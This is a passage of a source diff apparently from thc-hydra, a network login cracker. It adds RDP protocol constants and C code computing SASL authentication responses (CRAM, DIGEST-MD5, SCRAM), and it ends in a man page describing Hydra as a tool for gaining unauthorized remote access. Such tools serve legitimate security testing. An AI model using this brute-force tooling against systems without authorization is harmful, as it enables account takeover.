RDP_CTL_REQUEST_CONTROL = 1, + RDP_CTL_GRANT_CONTROL = 2, + RDP_CTL_DETACH = 3, + RDP_CTL_COOPERATE = 4 +}; + +enum RDP_UPDATE_PDU_TYPE +{ + RDP_UPDATE_ORDERS = 0, + RDP_UPDATE_BITMAP = 1, + RDP_UPDATE_PALETTE = 2, + RDP_UPDATE_SYNCHRONIZE = 3 +}; + +/* RDP bitmap cache (version 2) constants */ +#define BMPCACHE2_C0_CELLS 0x78 +#define BMPCACHE2_C1_CELLS 0x78 +#define BMPCACHE2_C2_CELLS 0x150 +#define BMPCACHE2_NUM_PSTCELLS 0x9f6 + +#define PDU_FLAG_FIRST 0x01 +#define PDU_FLAG_LAST 0x02 + +/* RDP capabilities */ +#define RDP_CAPSET_GENERAL 1 /* Maps to generalCapabilitySet in T.128 page 138 */ +#define RDP_CAPLEN_GENERAL 0x18 +#define OS_MAJOR_TYPE_UNIX 4 +#define OS_MINOR_TYPE_XSERVER 7 + +#define RDP_CAPSET_BITMAP 2 +#define RDP_CAPLEN_BITMAP 0x1C + +#define RDP_CAPSET_ORDER 3 +#define RDP_CAPLEN_ORDER 0x58 + +#define RDP_CAPSET_BMPCACHE 4 +#define RDP_CAPLEN_BMPCACHE 0x28 + +#define RDP_CAPSET_CONTROL 5 +#define RDP_CAPLEN_CONTROL 0x0C + +#define RDP_CAPSET_ACTIVATE 7 +#define RDP_CAPLEN_ACTIVATE 0x0C + +#define RDP_CAPSET_POINTER 8 +#define RDP_CAPLEN_POINTER 0x08 +#define RDP_CAPLEN_NEWPOINTER 0x0a + +#define RDP_CAPSET_SHARE 9 +#define RDP_CAPLEN_SHARE 0x08 + +#define RDP_CAPSET_COLCACHE 10 +#define RDP_CAPLEN_COLCACHE 0x08 + +#define RDP_CAPSET_BRUSHCACHE 15 +#define RDP_CAPLEN_BRUSHCACHE 0x08 + +#define RDP_CAPSET_BMPCACHE2 19 +#define RDP_CAPLEN_BMPCACHE2 0x28 + +#define RDP_SOURCE "MSTSC" + +/* Logon flags */ +#define RDP_LOGON_AUTO 0x0008 +#define RDP_LOGON_NORMAL 0x0033 +#define RDP_LOGON_COMPRESSION 0x0080 /* mppc compression with 8kB histroy buffer */ +#define RDP_LOGON_BLOB 0x0100 +#define RDP_LOGON_COMPRESSION2 0x0200 /* rdp5 mppc compression with 64kB history buffer */ +#define RDP_LOGON_LEAVE_AUDIO 0x2000 + +#define RDP5_DISABLE_NOTHING 0x00 +#define RDP5_NO_WALLPAPER 0x01 +#define RDP5_NO_FULLWINDOWDRAG 0x02 +#define RDP5_NO_MENUANIMATIONS 0x04 +#define RDP5_NO_THEMING 0x08 +#define RDP5_NO_CURSOR_SHADOW 0x20 +#define RDP5_NO_CURSORSETTINGS 0x40 /* disables cursor blinking */ + +/* compression types */ +#define RDP_MPPC_BIG 0x01 +#define RDP_MPPC_COMPRESSED 0x20 +#define RDP_MPPC_RESET 0x40 +#define RDP_MPPC_FLUSH 0x80 +#define RDP_MPPC_DICT_SIZE 65536 + +#define RDP5_COMPRESSED 0x80 + +#ifndef _SSL_H +#define _SSL_H + +#include +#include +#include +#include +#include +#include + +#if defined(OPENSSL_VERSION_NUMBER) && (OPENSSL_VERSION_NUMBER >= 0x0090800f) +#define D2I_X509_CONST const +#else +#define D2I_X509_CONST +#endif + +#define SSL_RC4 RC4_KEY +#define SSL_SHA1 SHA_CTX +#define SSL_MD5 MD5_CTX +#define SSL_CERT X509 +#define SSL_RKEY RSA +#endif + +/* for win8 */ +#define KBD_FLAG_DOWN 0x4000 +#define KBD_FLAG_UP 0x8000 +#define RDP_KEYRELEASE (KBD_FLAG_DOWN | KBD_FLAG_UP) +#define FASTPATH_INPUT_KBDFLAGS_RELEASE 1 +#define FASTPATH_INPUT_EVENT_SCANCODE 0 +#define FASTPATH_INPUT_EVENT_MOUSE 1 +#define RDP_INPUT_MOUSE 0x8001 +#define RDP_INPUT_SCANCODE 4 + +/* iso.c */ +STREAM iso_init(int length); +void iso_send(STREAM s); +STREAM iso_recv(uint8 * rdpver); +BOOL iso_connect(char *server, char *username, BOOL reconnect); +void iso_disconnect(void); +void iso_reset_state(void); +/* mcs.c */ +STREAM mcs_init(int length); +void mcs_send_to_channel(STREAM s, uint16 channel); +void mcs_send(STREAM s); +STREAM mcs_recv(uint16 * channel, uint8 * rdpver); +BOOL mcs_connect(char *server, STREAM mcs_data, char *username, BOOL reconnect); +void mcs_disconnect(void); +void mcs_reset_state(void); +/* orders.c */ +void process_orders(STREAM s, uint16 num_orders); +void reset_order_state(void); +/* rdesktop.c */ +void generate_random(uint8 * random); +void *xmalloc(int size); +void exit_if_null(void *ptr); +char *xstrdup(const char *s); +void *xrealloc(void *oldmem, size_t size); +void error(char *format, ...); +void warning(char *format, ...); +void unimpl(char *format, ...); +void hexdump(unsigned char *p, unsigned int len); +/* rdp.c */ +static void process_demand_active(STREAM s); +static BOOL process_data_pdu(STREAM s, uint32 * ext_disc_reason); +/* secure.c */ +void sec_hash_48(uint8 * out, uint8 * in, uint8 * salt1, uint8 * salt2, uint8 salt); +void sec_hash_16(uint8 * out, uint8 * in, uint8 * salt1, uint8 * salt2); +void buf_out_uint32(uint8 * buffer, uint32 value); +void sec_sign(uint8 * signature, int siglen, uint8 * session_key, int keylen, uint8 * data, + int datalen); +void sec_decrypt(uint8 * data, int length); +STREAM sec_init(uint32 flags, int maxlen); +void sec_send_to_channel(STREAM s, uint32 flags, uint16 channel); +void sec_send(STREAM s, uint32 flags); +void sec_process_mcs_data(STREAM s); +STREAM sec_recv(uint8 * rdpver); +BOOL sec_connect(char *server, char *username, BOOL reconnect); +void sec_disconnect(void); +void sec_reset_state(void); +/* tcp.c */ +STREAM tcp_init(uint32 maxlen); +void tcp_send(STREAM s); +STREAM tcp_recv(STREAM s, uint32 length); +BOOL tcp_connect(char *server); +void tcp_disconnect(void); +char *tcp_get_address(void); +void tcp_reset_state(void); diff --git a/sasl.c b/sasl.c new file mode 100644 index 0000000..dd16bc7 --- /dev/null +++ b/sasl.c @@ -0,0 +1,716 @@ +#include "sasl.h" + +/* + +print_hex is used for debug +it displays the string buf hexa values of size len + +*/ +int print_hex(unsigned char *buf, int len) { + int i; + int n; + + for (i = 0, n = 0; i < len; i++) { + if (n > 7) { + printf("\n"); + n = 0; + } + printf("0x%02x, ", buf[i]); + n++; + } + printf("\n"); + + return (0); +} + +/* + +RFC 4013: SASLprep: Stringprep Profile for User Names and Passwords +code based on gsasl_saslprep from GSASL project + +*/ + +int sasl_saslprep(const char *in, sasl_saslprep_flags flags, char **out) { +#if LIBIDN + int rc; + + rc = stringprep_profile(in, out, "SASLprep", (flags & SASL_ALLOW_UNASSIGNED) ? STRINGPREP_NO_UNASSIGNED : 0); + + if (rc != STRINGPREP_OK) { + *out = NULL; + return -1; + } +#if defined HAVE_PR29_H + if (pr29_8z(*out) != PR29_SUCCESS) { + free(*out); + *out = NULL; + return -1; + } +#endif + +#else + size_t i, inlen = strlen(in); + + for (i = 0; i < inlen; i++) { + if (in[i] & 0x80) { + *out = NULL; + hydra_report(stderr, "Error: Can't convert UTF-8, you should install libidn\n"); + return -1; + } + } + *out = malloc(inlen + 1); + if (!*out) { + hydra_report(stderr, "Error: Can't allocate memory\n"); + return -1; + } + strcpy(*out, in); +#endif + return 0; +} + + +/* + +RFC 4616: The PLAIN Simple Authentication and Security Layer (SASL) Mechanism + +sasl_plain computes the plain authentication from strings login and password +and stored the value in variable result + +the first parameter result must be able to hold at least 255 bytes! + +*/ + +void sasl_plain(char *result, char *login, char *pass) { + char *preplogin; + char *preppasswd; + + int rc = sasl_saslprep(login, SASL_ALLOW_UNASSIGNED, &preplogin); + + if (rc) { + result = NULL; + return; + } + + rc = sasl_saslprep(pass, 0, &preppasswd); + if (rc) { + free(preplogin); + result = NULL; + return; + } + + if (2 * strlen(preplogin) + 3 + strlen(preppasswd) < 180) { + strcpy(result, preplogin); + strcpy(result + strlen(preplogin) + 1, preplogin); + strcpy(result + 2 * strlen(preplogin) + 2, preppasswd); + hydra_tobase64((unsigned char *) result, strlen(preplogin) * 2 + strlen(preppasswd) + 2, 250); + } + free(preplogin); + free(preppasswd); +} + +#ifdef LIBOPENSSL + +/* + +RFC 2195: IMAP/POP AUTHorize Extension for Simple Challenge/Response + +sasl_cram_md5 computes the cram-md5 authentication from password string +and the challenge sent by the server, and stored the value in variable +result + +the parameter result must be able to hold at least 100 bytes! + +*/ + +void sasl_cram_md5(char *result, char *pass, char *challenge) { + char ipad[64]; + char opad[64]; + unsigned char md5_raw[MD5_DIGEST_LENGTH]; + MD5_CTX md5c; + int i, rc; + char *preppasswd; + + if (challenge == NULL) { + result = NULL; + return; + } + + rc = sasl_saslprep(pass, 0, &preppasswd); + if (rc) { + result = NULL; + return; + } + + memset(ipad, 0, sizeof(ipad)); + memset(opad, 0, sizeof(opad)); + + if (strlen(preppasswd) >= 64) { + MD5_Init(&md5c); + MD5_Update(&md5c, preppasswd, strlen(preppasswd)); + MD5_Final(md5_raw, &md5c); + memcpy(ipad, md5_raw, MD5_DIGEST_LENGTH); + memcpy(opad, md5_raw, MD5_DIGEST_LENGTH); + } else { + strcpy(ipad, preppasswd); // safe + strcpy(opad, preppasswd); // safe + } + + for (i = 0; i < 64; i++) { + ipad[i] ^= 0x36; + opad[i] ^= 0x5c; + } + MD5_Init(&md5c); + MD5_Update(&md5c, ipad, 64); + MD5_Update(&md5c, challenge, strlen(challenge)); + MD5_Final(md5_raw, &md5c); + + MD5_Init(&md5c); + MD5_Update(&md5c, opad, 64); + MD5_Update(&md5c, md5_raw, MD5_DIGEST_LENGTH); + MD5_Final(md5_raw, &md5c); + for (i = 0; i < MD5_DIGEST_LENGTH; i++) { + sprintf(result, "%02x", md5_raw[i]); + result += 2; + } + free(preppasswd); +} + +/* + +sasl_cram_sha1 computes the cram-sha1 authentication from password string +and the challenge sent by the server, and stored the value in variable +result + +the parameter result must be able to hold at least 100 bytes! + +*/ +void sasl_cram_sha1(char *result, char *pass, char *challenge) { + char ipad[64]; + char opad[64]; + unsigned char sha1_raw[SHA_DIGEST_LENGTH]; + SHA_CTX shac; + int i, rc; + char *preppasswd; + + if (challenge == NULL) { + result = NULL; + return; + } + + rc = sasl_saslprep(pass, 0, &preppasswd); + if (rc) { + result = NULL; + return; + } + + memset(ipad, 0, sizeof(ipad)); + memset(opad, 0, sizeof(opad)); + + if (strlen(preppasswd) >= 64) { + SHA1_Init(&shac); + SHA1_Update(&shac, preppasswd, strlen(preppasswd)); + SHA1_Final(sha1_raw, &shac); + memcpy(ipad, sha1_raw, SHA_DIGEST_LENGTH); + memcpy(opad, sha1_raw, SHA_DIGEST_LENGTH); + } else { + strcpy(ipad, preppasswd); // safe + strcpy(opad, preppasswd); // safe + } + + for (i = 0; i < 64; i++) { + ipad[i] ^= 0x36; + opad[i] ^= 0x5c; + } + + SHA1_Init(&shac); + SHA1_Update(&shac, ipad, 64); + SHA1_Update(&shac, challenge, strlen(challenge)); + SHA1_Final(sha1_raw, &shac); + + SHA1_Init(&shac); + SHA1_Update(&shac, opad, 64); + SHA1_Update(&shac, sha1_raw, SHA_DIGEST_LENGTH); + SHA1_Final(sha1_raw, &shac); + + for (i = 0; i < SHA_DIGEST_LENGTH; i++) { + sprintf(result, "%02x", sha1_raw[i]); + result += 2; + } + free(preppasswd); +} + +/* + +sasl_cram_sha256 computes the cram-sha256 authentication from password string +and the challenge sent by the server, and stored the value in variable +result + +the parameter result must be able to hold at least 100 bytes! + +*/ +void sasl_cram_sha256(char *result, char *pass, char *challenge) { + char ipad[64]; + char opad[64]; + unsigned char sha256_raw[SHA256_DIGEST_LENGTH]; + SHA256_CTX sha256c; + int i, rc; + char *preppasswd; + + if (challenge == NULL) { + result = NULL; + return; + } + + memset(ipad, 0, sizeof(ipad)); + memset(opad, 0, sizeof(opad)); + + rc = sasl_saslprep(pass, 0, &preppasswd); + if (rc) { + result = NULL; + return; + } + + if (strlen(preppasswd) >= 64) { + SHA256_Init(&sha256c); + SHA256_Update(&sha256c, preppasswd, strlen(preppasswd)); + SHA256_Final(sha256_raw, &sha256c); + memcpy(ipad, sha256_raw, SHA256_DIGEST_LENGTH); + memcpy(opad, sha256_raw, SHA256_DIGEST_LENGTH); + } else { + strcpy(ipad, preppasswd); // safe + strcpy(opad, preppasswd); // safe + } + + for (i = 0; i < 64; i++) { + ipad[i] ^= 0x36; + opad[i] ^= 0x5c; + } + + SHA256_Init(&sha256c); + SHA256_Update(&sha256c, ipad, 64); + SHA256_Update(&sha256c, challenge, strlen(challenge)); + SHA256_Final(sha256_raw, &sha256c); + + SHA256_Init(&sha256c); + SHA256_Update(&sha256c, opad, 64); + SHA256_Update(&sha256c, sha256_raw, SHA256_DIGEST_LENGTH); + SHA256_Final(sha256_raw, &sha256c); + + for (i = 0; i < SHA256_DIGEST_LENGTH; i++) { + sprintf(result, "%02x", sha256_raw[i]); + result += 2; + } + free(preppasswd); +} + +/* + +RFC 2831: Using Digest Authentication as a SASL Mechanism + +the parameter result must be able to hold at least 500 bytes!! + +*/ +void sasl_digest_md5(char *result, char *login, char *pass, char *buffer, char *miscptr, char *type, char *webtarget, int webport, char *header) { + char *pbuffer = NULL; + int array_size = 10; + unsigned char response[MD5_DIGEST_LENGTH]; + char *array[array_size]; + char buffer2[500], buffer3[500], nonce[200], realm[50], algo[20]; + int i = 0, ind = 0, lastpos = 0, currentpos = 0, intq = 0, auth_find = 0; + MD5_CTX md5c; + char *preplogin; + char *preppasswd; + + int rc = sasl_saslprep(login, SASL_ALLOW_UNASSIGNED, &preplogin); + + memset(realm, 0, sizeof(realm)); + + if (rc) { + result = NULL; + return; + } + + rc = sasl_saslprep(pass, 0, &preppasswd); + if (rc) { + free(preplogin); + result = NULL; + return; + } + //DEBUG S: nonce="HB3HGAk+hxKpijy/ichq7Wob3Zo17LPM9rr4kMX7xRM=",realm="tida",qop="auth",maxbuf=4096,charset=utf-8,algorithm=md5-sess + //DEBUG S: nonce="1Mr6c8WjOd/x5r8GUnGeQIRNUtOVtItu3kQOGAmsZfM=",realm="test.com",qop="auth,auth-int,auth-conf",cipher="rc4-40,rc4-56,rc4,des,3des",maxbuf=4096,charset=utf-8,algorithm=md5-sess + //warning some not well configured xmpp server is sending no realm + //DEBUG S: nonce="3448160828",qop="auth",charset=utf-8,algorithm=md5-sess + + pbuffer = buffer; + do { + currentpos++; + if (pbuffer[0] == '"') { + if (intq == 0) + intq = 1; + else { + intq = 0; + } + } + if ((pbuffer[0] == ',') && (intq == 0)) { + array[ind] = malloc(currentpos); + strncpy(array[ind], buffer + lastpos, currentpos - 1); + array[ind][currentpos - 1] = '\0'; + ind++; + lastpos += currentpos; + currentpos = 0; + } + pbuffer++; + } while ((pbuffer[0] != '\0') && (pbuffer[0] > 31) && (ind < array_size)); + + //save the latest one + array[ind] = malloc(currentpos + 1); + strncpy(array[ind], buffer + lastpos, currentpos); + array[ind][currentpos] = '\0'; + ind++; + + for (i = 0; i < ind; i++) { + //removing space chars between comma separated value if any + while ((array[i] != NULL) && (array[i][0] == ' ')) { + char *tmp = strdup(array[i]); + + memset(array[i], 0, sizeof(array[i])); + strcpy(array[i], tmp + 1); + free(tmp); + } + if (strstr(array[i], "nonce=") != NULL) { + //check if it contains double-quote + if (strstr(array[i], "\"") != NULL) { + //assume last char is also a double-quote + int nonce_string_len = strlen(array[i]) - strlen("nonce=\"") - 1; + + if ((nonce_string_len > 0) && (nonce_string_len <= sizeof(nonce) - 1)) { + strncpy(nonce, strstr(array[i], "nonce=") + strlen("nonce=") + 1, nonce_string_len); + nonce[nonce_string_len] = '\0'; + } else { + int j; + + for (j = 0; j < ind; j++) + if (array[j] != NULL) + free(array[j]); + hydra_report(stderr, "Error: DIGEST-MD5 nonce from server could not be extracted\n"); + result = NULL; + return; + } + } else { + strncpy(nonce, strstr(array[i], "nonce=") + strlen("nonce="), sizeof(nonce) - 1); + nonce[sizeof(nonce) - 1] = '\0'; + } + } + if (strstr(array[i], "realm=") != NULL) { + if (strstr(array[i], "\"") != NULL) { + //assume last char is also a double-quote + int realm_string_len = strlen(array[i]) - strlen("realm=\"") - 1; + + if ((realm_string_len > 0) && (realm_string_len <= sizeof(realm) - 1)) { + strncpy(realm, strstr(array[i], "realm=") + strlen("realm=") + 1, realm_string_len); + realm[realm_string_len] = '\0'; + } else { + int i; + + for (i = 0; i < ind; i++) + if (array[i] != NULL) + free(array[i]); + hydra_report(stderr, "Error: DIGEST-MD5 realm from server could not be extracted\n"); + result = NULL; + return; + } + } else { + strncpy(realm, strstr(array[i], "realm=") + strlen("realm="), sizeof(realm) - 1); + realm[sizeof(realm) - 1] = '\0'; + } + } + if (strstr(array[i], "qop=") != NULL) { + /* + The value "auth" indicates authentication; the value "auth-int" indicates + authentication with integrity protection; the value "auth-conf" + indicates authentication with integrity protection and encryption. + */ + auth_find = 1; + if ((strstr(array[i], "\"auth\"") == NULL) && (strstr(array[i], "\"auth,") == NULL) && (strstr(array[i], ",auth\"") == NULL)) { + int j; + + for (j = 0; j < ind; j++) + if (array[j] != NULL) + free(array[j]); + hydra_report(stderr, "Error: DIGEST-MD5 quality of protection only authentication is not supported by server\n"); + result = NULL; + return; + } + } + if (strstr(array[i], "algorithm=") != NULL) { + if (strstr(array[i], "\"") != NULL) { + //assume last char is also a double-quote + int algo_string_len = strlen(array[i]) - strlen("algorithm=\"") - 1; + + if ((algo_string_len > 0) && (algo_string_len <= sizeof(algo) - 1)) { + strncpy(algo, strstr(array[i], "algorithm=") + strlen("algorithm=") + 1, algo_string_len); + algo[algo_string_len] = '\0'; + } else { + int j; + + for (j = 0; j < ind; j++) + if (array[j] != NULL) + free(array[j]); + hydra_report(stderr, "Error: DIGEST-MD5 algorithm from server could not be extracted\n"); + result = NULL; + return; + } + } else { + strncpy(algo, strstr(array[i], "algorithm=") + strlen("algorithm="), sizeof(algo) - 1); + algo[sizeof(algo) - 1] = '\0'; + } + if ((strstr(algo, "MD5") == NULL) && (strstr(algo, "md5") == NULL)) { + int j; + + for (j = 0; j < ind; j++) + if (array[j] != NULL) + free(array[j]); + hydra_report(stderr, "Error: DIGEST-MD5 algorithm not based on md5, based on %s\n", algo); + result = NULL; + return; + } + } + free(array[i]); + array[i] = NULL; + } + + if (!strlen(algo)) { + //assuming by default algo is MD5 + memset(algo, 0, sizeof(algo)); + strcpy(algo, "MD5"); + } + //xmpp case, some xmpp server is not sending the realm so we have to set it up + if ((strlen(realm) == 0) && (strstr(type, "xmpp") != NULL)) + snprintf(realm, sizeof(realm), "%s", miscptr); + + //compute ha1 + //support for algo = MD5 + snprintf(buffer, 500, "%s:%s:%s", preplogin, realm, preppasswd); + + MD5_Init(&md5c); + MD5_Update(&md5c, buffer, strlen(buffer)); + MD5_Final(response, &md5c); + + //for MD5-sess + if (strstr(algo, "5-sess") != NULL) { + memset(buffer, 0, sizeof(buffer)); + + /* per RFC 2617 Errata ID 1649 */ + if ((strstr(type, "proxy") != NULL) || (strstr(type, "GET") != NULL) || (strstr(type, "HEAD") != NULL)) { + memset(buffer3, 0, sizeof(buffer3)); + pbuffer = buffer3; + for (i = 0; i < MD5_DIGEST_LENGTH; i++) { + sprintf(pbuffer, "%02x", response[i]); + pbuffer += 2; + } + sprintf(buffer, "%s:%s:%s", buffer3, nonce, "hydra"); + } else { + memcpy(buffer, response, sizeof(response)); + sprintf(buffer + sizeof(response), ":%s:%s", nonce, "hydra"); + } + + MD5_Init(&md5c); + MD5_Update(&md5c, buffer, strlen(buffer)); + MD5_Final(response, &md5c); + } + memset(buffer3, 0, sizeof(buffer3)); + pbuffer = buffer3; + for (i = 0; i < MD5_DIGEST_LENGTH; i++) { + sprintf(pbuffer, "%02x", response[i]); + pbuffer += 2; + } + + //compute ha2 + //proxy case + if (strstr(type, "proxy") != NULL) + sprintf(buffer, "%s:%s", "HEAD", miscptr); + else + //http case + if ((strstr(type, "GET") != NULL) || (strstr(type, "HEAD") != NULL)) + sprintf(buffer, "%s:%s", type, miscptr); + else + //sip case + if (strstr(type, "sip") != NULL) + sprintf(buffer, "REGISTER:%s:%s", type, miscptr); + else + //others + sprintf(buffer, "AUTHENTICATE:%s/%s", type, realm); + + MD5_Init(&md5c); + MD5_Update(&md5c, buffer, strlen(buffer)); + MD5_Final(response, &md5c); + + pbuffer = buffer2; + for (i = 0; i < MD5_DIGEST_LENGTH; i++) { + sprintf(pbuffer, "%02x", response[i]); + pbuffer += 2; + } + + //compute response + if (!auth_find) + snprintf(buffer, 500, "%s:%s", nonce, buffer2); + else + snprintf(buffer, 500, "%s:%s:%s:%s:%s", nonce, "00000001", "hydra", "auth", buffer2); + MD5_Init(&md5c); + MD5_Update(&md5c, buffer3, strlen(buffer3)); + MD5_Update(&md5c, ":", 1); + MD5_Update(&md5c, buffer, strlen(buffer)); + MD5_Final(response, &md5c); + + pbuffer = buffer; + for (i = 0; i < MD5_DIGEST_LENGTH; i++) { + sprintf(pbuffer, "%02x", response[i]); + pbuffer += 2; + } + + //create the auth response + if (strstr(type, "proxy") != NULL) { + snprintf(result, 500, + "HEAD %s HTTP/1.0\r\n%sProxy-Authorization: Digest username=\"%s\", realm=\"%s\", response=\"%s\", nonce=\"%s\", cnonce=\"hydra\", nc=00000001, algorithm=%s, qop=auth, uri=\"%s\"\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nConnection: keep-alive\r\n%s\r\n", + miscptr, webtarget, preplogin, realm, buffer, nonce, algo, miscptr, header); + } else { + if ((strstr(type, "imap") != NULL) || (strstr(type, "pop") != NULL) || (strstr(type, "smtp") != NULL) || + (strstr(type, "ldap") != NULL) || (strstr(type, "xmpp") != NULL) || (strstr(type, "nntp") != NULL)) { + snprintf(result, 500, "username=\"%s\",realm=\"%s\",nonce=\"%s\",cnonce=\"hydra\",nc=00000001,algorithm=%s,qop=\"auth\",digest-uri=\"%s/%s\",response=%s", preplogin, realm, + nonce, algo, type, realm, buffer); + } else { + if (strstr(type, "sip") != NULL) { + snprintf(result, 500, "username=\"%s\",realm=\"%s\",nonce=\"%s\",uri=\"%s:%s\",response=%s", preplogin, realm, nonce, type, realm, buffer); + } else { + if (use_proxy == 1 && proxy_authentication != NULL) + snprintf(result, 500, + "%s http://%s:%d%s HTTP/1.0\r\nHost: %s\r\nAuthorization: Digest username=\"%s\", realm=\"%s\", response=\"%s\", nonce=\"%s\", cnonce=\"hydra\", nc=00000001, algorithm=%s, qop=auth, uri=\"%s\"\r\nProxy-Authorization: Basic %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nConnection: keep-alive\r\n%s\r\n", + type, webtarget, webport, miscptr, webtarget, preplogin, realm, buffer, nonce, algo, miscptr, proxy_authentication, header); + else { + if (use_proxy == 1) + snprintf(result, 500, + "%s http://%s:%d%s HTTP/1.0\r\nHost: %s\r\nAuthorization: Digest username=\"%s\", realm=\"%s\", response=\"%s\", nonce=\"%s\", cnonce=\"hydra\", nc=00000001, algorithm=%s, qop=auth, uri=\"%s\"\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nConnection: keep-alive\r\n%s\r\n", + type, webtarget, webport, miscptr, webtarget, preplogin, realm, buffer, nonce, algo, miscptr, header); + else + snprintf(result, 500, + "%s %s HTTP/1.0\r\nHost: %s\r\nAuthorization: Digest username=\"%s\", realm=\"%s\", response=\"%s\", nonce=\"%s\", cnonce=\"hydra\", nc=00000001, algorithm=%s, qop=auth, uri=\"%s\"\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nConnection: keep-alive\r\n%s\r\n", + type, miscptr, webtarget, preplogin, realm, buffer, nonce, algo, miscptr, header); + } + } + } + } + free(preplogin); + free(preppasswd); +} + + +/* + +RFC 5802: Salted Challenge Response Authentication Mechanism +Note: SCRAM is a client-first SASL mechanism + +I want to thx Simon Josefsson for his public server test, +and my girlfriend that let me work on that 2 whole nights ;) + +clientfirstmessagebare must be at least 500 bytes in size! + +*/ +void sasl_scram_sha1(char *result, char *pass, char *clientfirstmessagebare, char *serverfirstmessage) { + int saltlen = 0; + int iter = 4096; + char *salt, *nonce, *ic; + unsigned int resultlen = 0; + char clientfinalmessagewithoutproof[200]; + char buffer[500]; + unsigned char SaltedPassword[SHA_DIGEST_LENGTH]; + unsigned char ClientKey[SHA_DIGEST_LENGTH]; + unsigned char StoredKey[SHA_DIGEST_LENGTH]; + unsigned char ClientSignature[SHA_DIGEST_LENGTH]; + char AuthMessage[1024]; + char ClientProof[SHA_DIGEST_LENGTH]; + unsigned char clientproof_b64[50]; + char *preppasswd; + + int rc = sasl_saslprep(pass, 0, &preppasswd); + + if (rc) { + result = NULL; + return; + } + + /*client-final-message */ + if (verbose) + hydra_report(stderr, "DEBUG S: %s\n", serverfirstmessage); + + //r=hydra28Bo7kduPpAZLzhRQiLxc8Y9tiwgw+yP,s=ldDgevctH+Kg7b8RnnA3qA==,i=4096 + if (strstr(serverfirstmessage, "r=") == NULL) { + hydra_report(stderr, "Error: Can't understand server message\n"); + free(preppasswd); + result = NULL; + return; + } + strncpy(buffer, serverfirstmessage, sizeof(buffer) - 1); + buffer[sizeof(buffer) - 1] = '\0'; + nonce = strtok(buffer, ","); + //continue to search from the previous successful call + salt = strtok(NULL, ","); + ic = strtok(NULL, ","); + + iter = atoi(ic + 2); + if (iter == 0) { + hydra_report(stderr, "Error: Can't understand server response\n"); + free(preppasswd); + result = NULL; + return; + } + + if ((nonce != NULL) && (strlen(nonce) > 2)) + snprintf(clientfinalmessagewithoutproof, sizeof(clientfinalmessagewithoutproof), "c=biws,%s", nonce); + else { + hydra_report(stderr, "Error: Could not identify server nonce value\n"); + free(preppasswd); + result = NULL; + return; + } + + if ((salt != NULL) && (strlen(salt) > 2)) + //s=ghgIAfLl1+yUy/Xl1WD5Tw== remove the header s= + strcpy(buffer, salt + 2); + else { + hydra_report(stderr, "Error: Could not identify server salt value\n"); + free(preppasswd); + result = NULL; + return; + } + + /* SaltedPassword := Hi(Normalize(password), salt, i) */ + saltlen = from64tobits((char *) salt, buffer); + + if (PKCS5_PBKDF2_HMAC_SHA1(preppasswd, strlen(preppasswd), (unsigned char *) salt, saltlen, iter, SHA_DIGEST_LENGTH, SaltedPassword) != 1) { + hydra_report(stderr, "Error: Failed to generate PBKDF2\n"); + free(preppasswd); + result = NULL; + return; + } + + /* ClientKey := HMAC(SaltedPassword, "Client Key") */ +#define CLIENT_KEY "Client Key" + HMAC(EVP_sha1(), SaltedPassword, SHA_DIGEST_LENGTH, (const unsigned char *) CLIENT_KEY, strlen(CLIENT_KEY), ClientKey, &resultlen); + + /* StoredKey := H(ClientKey) */ + SHA1((const unsigned char *) ClientKey, SHA_DIGEST_LENGTH, StoredKey); + + /* ClientSignature := HMAC(StoredKey, AuthMessage) */ + snprintf(AuthMessage, 500, "%s,%s,%s", clientfirstmessagebare, serverfirstmessage, clientfinalmessagewithoutproof); + HMAC(EVP_sha1(), StoredKey, SHA_DIGEST_LENGTH, (const unsigned char *) AuthMessage, strlen(AuthMessage), ClientSignature, &resultlen); + + /* ClientProof := ClientKey XOR ClientSignature */ + xor(ClientProof, (char *) ClientKey, (char *) ClientSignature, 20); + to64frombits(clientproof_b64, (const unsigned char *) ClientProof, 20); + + snprintf(result, 500, "%s,p=%s", clientfinalmessagewithoutproof, clientproof_b64); + if (verbose) + hydra_report(stderr, "DEBUG C: %s\n", result); + free(preppasswd); +} +#endif diff --git a/sasl.h b/sasl.h new file mode 100644 index 0000000..dd6725e --- /dev/null +++ b/sasl.h @@ -0,0 +1,50 @@ + +#include +#include +#include "ntlm.h" +#include "hydra-mod.h" + +#define AUTH_ERROR -1 +#define AUTH_CLEAR 0 +#define AUTH_APOP 1 +#define AUTH_LOGIN 2 +#define AUTH_PLAIN 3 +#define AUTH_CRAMMD5 4 +#define AUTH_CRAMSHA1 5 +#define AUTH_CRAMSHA256 6 +#define AUTH_DIGESTMD5 7 +#define AUTH_SCRAMSHA1 8 +#define AUTH_NTLM 9 +#define AUTH_NTLMv2 10 +#define AUTH_BASIC 11 +#define AUTH_LM 12 +#define AUTH_LMv2 13 + +#if LIBIDN +#include +#if defined HAVE_PR29_H +#include +#endif +#endif + +typedef enum { + SASL_ALLOW_UNASSIGNED = 1 +} sasl_saslprep_flags; + + +int print_hex(unsigned char *buf, int len); + +void sasl_plain(char *result, char *login, char *pass); +int sasl_saslprep(const char *in, sasl_saslprep_flags flags, char **out); + +#ifdef LIBOPENSSL +#include +#include +#include + +void sasl_cram_md5(char *result, char *pass, char *challenge); +void sasl_cram_sha1(char *result, char *pass, char *challenge); +void sasl_cram_sha256(char *result, char *pass, char *challenge); +void sasl_digest_md5(char *result, char *login, char *pass, char *buffer, char *miscptr, char *type, char *webtarget, int webport, char *header); +void sasl_scram_sha1(char *result, char *pass, char *clientfirstmessagebare, char *serverfirstmessage); +#endif diff --git a/xhydra.1 b/xhydra.1 new file mode 100644 index 0000000..a16b0c1 --- /dev/null +++ b/xhydra.1 @@ -0,0 +1,31 @@ +.TH "XHYDRA" "1" "02/02/2012" +.SH NAME +xhydra \- Gtk+2 frontend for thc-hydra +.SH SYNOPSIS +Execute xhydra in a terminal to start the application. +.SH DESCRIPTION +Hydra is a parallized login cracker which supports numerous protocols +to attack. New modules are easy to add, beside that, it is flexible and +very fast. + +This tool gives researchers and security consultants the possiblity to +show how easy it would be to gain unauthorized access from remote to a +system. + +Currently this tool supports: + AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, + HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, + HTTPS-GET, HTTPS-HEAD, ICQ, IMAP, IRC, LDAP, MS-SQL, 